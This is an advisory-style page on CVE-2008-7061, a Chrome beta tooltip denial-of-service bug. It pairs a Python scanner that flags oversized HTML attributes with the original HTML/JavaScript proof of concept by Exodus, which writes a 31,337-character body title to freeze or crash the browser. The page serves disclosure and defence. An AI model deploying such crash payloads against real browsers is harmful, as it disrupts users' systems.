CVE-2008-7061 (chrome freeze exploit)


Overview:
The tooltip manager (chrome/views/tooltip_manager.cc) in Google Chrome 0.2.149.29 Build 1798 and possibly other versions before 0.2.149.30 allows remote attackers to cause a denial of service (CPU consumption or crash) via a tag with a long title attribute, which is not properly handled when displaying a tooltip, a different vulnerability than CVE-2008-6994.
Source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7061
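The defect described above is a missing length cap on attribute values passed to the tooltip manager. The following is an added example (not Exodus's code and not Chromium's fix) of the check a content filter or proxy could run to flag HTML carrying such values: it parses the document with Python's html.parser and reports every attribute longer than a threshold. The 1024-character threshold and the sample pages are assumptions constructed for this example; the 31337 figure mirrors the PoC on this page. Note that a static scan only sees attributes that are literally present in the markup; the PoC builds its title at runtime via document.write, which only the browser-side fix (truncating the tooltip) addresses.

```python
from html.parser import HTMLParser

# Assumed threshold: legitimate title/alt text is far shorter than this.
DEFAULT_MAX_ATTR_LEN = 1024


class OversizedAttrScanner(HTMLParser):
    """Collects (tag, attribute, length) for attribute values over max_len."""

    def __init__(self, max_len):
        super().__init__()
        self.max_len = max_len
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # Valueless attributes (e.g. <input disabled>) arrive as None.
            if value is not None and len(value) > self.max_len:
                self.findings.append((tag, name, len(value)))

    def handle_startendtag(self, tag, attrs):
        # Self-closing tags (<img ... />) get the same treatment.
        self.handle_starttag(tag, attrs)


def find_oversized_attributes(html, max_len=DEFAULT_MAX_ATTR_LEN):
    """Return a list of (tag, attribute, length) for every oversized attribute."""
    scanner = OversizedAttrScanner(max_len)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample documents for this example.
BENIGN_PAGE = (
    '<html><head><title>ok</title></head>'
    '<body title="hover text"><img src="a.png" alt="logo"/></body></html>'
)

# Same shape as the PoC's output, but with the title written directly into
# the markup so that a static scanner can see it.
HOSTILE_PAGE = (
    '<html><head><title>long title</title></head>'
    '<body title="' + 'E' * 31337 + '"></body></html>'
)


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("hostile", HOSTILE_PAGE)):
        hits = find_oversized_attributes(page)
        print(label, "->", hits if hits else "no oversized attributes")
```

Running the module prints no findings for the benign page and a single `('body', 'title', 31337)` finding for the hostile one; in a proxy you would reject or truncate the value at that point rather than forward it to the client.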

Here is the original exploit description by Exodus:

Google has launched their new browser called Chrome in its very early BETA version (0.2.149.27)
and of course everyone is in the race for 0day exploits. So far only a few vulnerabilities have been found, most of them are low severity exploits and none of them are of real use for massive 0wnage or something,
so I thought I'd give it a try and so far I've come up with another kinda useless exploit.
I've found that Chrome is having a hard time rendering an oversized title attribute, causing it to
– freeze under Vista SP1.
– crash in some cases under Windows XP SP1/SP2.

Exploit:

<!--
  Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit
  Exploit written by Exodus.
  http://www.blackhat.org.il
  http://www.blackhat.org.il/index.php/ready-set-chrome/
  http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
-->
<HTML>
 <HEAD>
  <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE>
  <SCRIPT language="JavaScript">
   // Build a string of 'len' copies of 'E'. The buffer must start as an
   // empty string; left undeclared it would begin with "undefined".
   function buff(len)
   {
    var buffer = '';
    for(var i = 0; i != len; i++)
    { buffer += 'E'; }
    return buffer;
   }
  </SCRIPT>
 </HEAD>
 <SCRIPT>
  // Write the opening BODY tag with an oversized title attribute, which
  // the tooltip manager in the affected builds fails to handle.
  document.write('<body title=\"' + buff(31337) + '\">');
 </SCRIPT>
 </BODY>
</HTML>
